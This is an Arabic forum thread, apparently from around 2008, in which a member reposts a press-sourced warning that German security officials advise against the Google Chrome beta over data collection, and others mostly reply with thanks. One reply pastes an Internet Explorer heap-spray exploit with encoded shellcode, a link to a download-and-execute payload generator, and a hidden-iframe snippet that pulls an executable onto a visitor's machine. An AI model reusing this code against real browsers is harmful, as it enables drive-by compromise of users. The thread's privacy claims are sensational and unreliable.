عاجل عاجل عاجل!تحذير شديد جداً .. لاتستخدم المتصفح الجديد من جوجل المسمى جوجل كروم

[RashX]

تحذير شديد جداً .. لاتستخدم المتصفح الجديد من جوجل المسمى جوجل كروم​

غير ناضج, فضولي وجوعه عتيق في إلتهام معلوماتك الشخصيّة
: ألمانيا تحذّر من استخدام غوغل كروم وتدعو المستخدمين الى اليقظة الشديدة ​

نقلت اليوم ( در شبيغل أون لاين ) تقريرا مرعبا لكل مستخدمي تطبيقات غوغل. فقد حذّر المكتب الإتحادي الألماني لأمن المعلومات التقنية المواطنين من خطر تركيب واستخدام النسخة الكرومية من غوغل بروزرز. وكان مسؤول أمن حماية المعلومات ماتياس غيرتنر قد أبلغ صحيفة ( برلينر تسايتونغ) : ​

غوغل كروم لا ينبغي لعوام الناس ان يستخدموها. أمّا الأسباب فكثيرة, أوّلها, أن هذا البروزر ما زال في طور المراقبة فنسخته تحمل الر قم (0.2) أي أنه أنزل الى الأسواق على عجل بسبب المزاحمة بين غوغل ومنافسيها. ثانيا, يعمل هذا البروزر بأسلوب (بيتا) وهو اسلوب سهل ولكنّه مفتوح ويمكن الولوج إليه من مهاجم يقوم بتسيير جهازك عن بعد والعبث بمحتوياته. ​

أضاف غيرتنر, لقد قام مصمموا برنامج غوغل كروم بإدخال برتوكول يقوم بنقل كل التفاصيل الكبيرة منها والصغيرة لحركة المستخدم بحجة ان ذلك هو ( كراش بروتوكول) وتزعم غوغل انها بذلك تريد إحصاء تلك الأخطاء المحتملة ليتم تلافيها في النسخة المستقبلية. غيرتنر الذي شعر بطعم مرير مريب جراء ذلك الزعم حسب تعبيره, مضى يقول: لقد اتفقنا كخبراء أمن حماية إتحاديين أن غوغل كروم سهل الإستخدام ولكن ماذا عن جمع المعلومات التي يتم تصديرها فورا الى (السيرفر ) الحاسوب الأم في كاليفورنيا؟؟ ​

الشيء المخيف أيضا ان غوغل كروم لا يتوقف عن التواصل مع السيرفر ولا يغطي معلوماتك وهويّتك الإلكترونية فحسب, وإنما يقوم بنسخ ونقل وحفظ كل المصطلحات التي كتبتها أو لقّمتها لآلة البحث حتى قبل ان تضغط على كلمة (إبحث). وبالتالي كل ما فكّرت فيه وبحثت عنه وكتبت حوله بل أن كلّ ما كنت تفكر بالبحث عنه صار معلوما ومخزّنا في كليفورنيا. ​

يقول ماتياس غيرتنر مسؤول أمن حماية المعلومات بالمكتب ​

الإتحادي الألماني لأمن المعلومات التقنية :​

بعد أن زادت شكوكي قمت بتقييد حركة مكوّنات وتطبيقات غوغل في جهازي. ثم دخلت الى صفحة (بي سي إي) وهو ملخص عبارة ( المكتب الإتحادي لأمن المعلومات الإلكترونية) وهناك قرأت تقريرا مخيفا عن تجاوزات غوغل عبر برنامجها ذاك حيث يقوم بنسخ كامل البيانات الشخصية دون شور ولا دستور ثم نقلها الى الأرشيف في الولايات المتحدة الأمريكية.​

​

( انتهى الخبر)​

هنا تجدر الإشارة الى ان غوغل يحاول منذ مدّة عبر استخداماته ومنه ( غوغل باكت) التي تشتمل على كل شيء تقريبا من بروزر الى نظام حماية ومقاومة للفيروسات الى برنامج تطبيقات للصور وغيره الدخول الى الأجهزة الشخصية والتحكم فيها. وقد لاحظت سابقا أن تطبيقات غوغل تصول وتجول عبر جهازي الشخصي دون طلب الإذن كما هو مفترض. فالمفروض عادة أن يفتح شباك نظام الحماية على الشاشة لديّ ويسألني: هل تريد تمرير هذا التطبيق؟؟ و يبقى لي القرار كمستخدم أن
أضغط على (نعم) أو ( لا) . ​

منقول للفائدة ،،،​

تقبلوا تحياتي ،،،
أخوكم : RashX​

 

[بنت الخالدي]

جزاك الله خير على التنبيه
والله يعطيك العافيه

تحيتي لك​

 

[Abu-7arb]

الله يعطيك العافية أخي على للتنبيه

 

[نوووف]

يسلمووو على التحذير
الفايرفوكس مافيه منه اثنين​

 

[طائفي نت]

فعلا أخي متصفح قوقل كروم فيه ثغرة ومشكلة الثغرة إنها مكتوبة بلغة html البسيطة لكن لا ننسى إن هذا المتصفح بيتا يعني إلى الآن ما نزلت النسخة الرسمية منه مما يعني إن المستخدم هو الذي يتحمل مسئوليته عند تحميله


إنظروا ماذا وجدت في أحد المنتديات ....... لا احد يناقشني فيه قلت وجدت ولا أعلم ما مدى صحيته

...

ابيكم تشوفون الثغرة اللي في اكسبلورر وتعرفون كيف حقارة الثغرة اللي في متصفح قوقل

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

شوفو هذي ثغرة متصفح الاكسبلورر :-أول شي يحتاج shell code

من هنا تصنع شل كود :-

http://sploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=%77%69%6e%33%32%5f%64%6f%77%6e%6c%6f%61%64%65%78%65%63

ومن هنا الثغرة :-

<HTML> 
<BODY> 
  < id=boom =:{7D6B5B29-FC7E-11D1-9288-00104B885781}"></> 
********** 
var payLoadCode=unescape( 
"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + 
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + 
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + 
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + 
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u3**8%u0000" + 
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + 
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + 
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u**40" + 
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + 
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + 
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + 
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + 
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + 
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + 
"%u652E%u6578%u9000"); 
 
        var spraySlide = unescape("%u9090%u9090"); 
      var heapSprayToAddress = 0x0c0c0c0c; 
 
    function Tryme() 
    { 
        var size_buff = 900; 
        var x =  unescape("%0C%0C%0C%0C"); 
        while (x.length<size_buff) x += x; 
        x = x.substring(0,size_buff); 
        boom.Fill(x); 
    } 
 
       function getSpraySlide(spraySlide, spraySlideSize) 
    { 
        while (spraySlide.length*2<spraySlideSize) 
        { 
            spraySlide += spraySlide; 
        } 
        spraySlide = spraySlide.substring(0,spraySlideSize/2); 
        return (spraySlide); 
    } 
        var heapBlockSize = 0x400000; 
        var SizeOfHeapDataMoreover = 0x26; 
        var payLoadSize = (payLoadCode.length * 2); 
        var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover); 
        var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize; 
        var memory = new Array(); 
        spraySlide = getSpraySlide(spraySlide,spraySlideSize); 
        for (i=0;i<heapBlocks;i++) 
        { 
            memory[i] = spraySlide +  payLoadCode; 
        } 
</******> 
<input language=Java****** onclick=Tryme() type=button value="Proof of Concept"> 
</BODY> 
</HTML>

وشوفو متصفح قوقل كيف حقارة الثغرة اللي فيه والاستغلاال جاهز مجهز بأبسط لغة برمجية ... اتوقع الأطفال راح يكشفون 100 وحده مثلها

<******>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</******>

هههههههههه وهذي ثغرة ثاانيه طازجه توهم مكتشفينها ... :-

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

ثغرة بالكوكيز

الله يفشلك ياقوقل :hh:ماتوقعناها منك:no:

وترقبووو ثغرات متصفح قوقل الجديدة قريييييبا :

 

[سعدالمنسي]

مشكور اخوي
RashX
على هذا التحذير
ودائما النسخ البيتا تكون غير كاملة وبها ثغرات
الله يحفظنا ويحفظك ويحفظ الجميع
دمت بخير

 

[بنادول]

مشكور أخي على التحذير

المشكله أني أصبحت أستخدمه بكثره

جاري حذفه الآن

 

[anascoo]

الله يعطيك العافية أخي على للتنبيه​

 

[RashX]

مشكووورين إخواني على المرووور الكريم ونووورتوا الموضوع وأنا ماسويت إلا الواجب ،،،


تقبلوا تحياتي ،،،

 

[المهووس]

بارك الله فيكم يالنمور الشجعان​

 

[salah6365]

​

يسلمووو على التحذير
الفايرفوكس مافيه منه اثنين

​

k:k:k:
​

 

[مصطفى المنسي]

مشكور أخي شوية ونزلناة

 

[mysterious2008]

الله يجزاك الخير ، تم الحذف

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

 

[h_amdy1959]

شكرا اخى على التحذير
والحمد لله ما استعملته​

 

[نادر في البشر]

عافاك ربـي يا الغالي بس ان جينا للجد ثغره بلا ما ثغرت هههههههههه الي يجيك من الله حياه الله اهم شي عاجبني ما علي من احد من يبي يخترق حياه بيلقىى كم خيشة بصـل ياخذهن معه مخيستن كمبيوتري ههههههههه


عموما يعطيك العافيه

 

[KoNaMi]

يعطيك العافيه اخوي رش رش

تقبل تحياتي

 

[حنشر]

الله يعطيك العافيه ...على التنبيهـ...
تقبل مروري...​

 

[samer allyl]

جزاك الله كل خير انا في الحقيقة ركبته للتجربة ووجدت انه لا يستحق الاعتماد عليه فليس به مميزات تجعل المستخدم يتجه له
وارى ان الفاير فوكس افضل منه بكثير ولا مجال للمقارنة

 

[السّاجد لله]

بارك الله فيك حبيبي الغالي ع التنبية وعموما الاصدار تجريبي وهو سهل وجميل وخفيف انا الان استخدمه والله الحافظ

 

[فاهد فاهد]

الله يعطيك العافية
ولا تحرمناا من جديدك
مشكور على التنبيييية ااخي في الله
ومنكم نستفيد​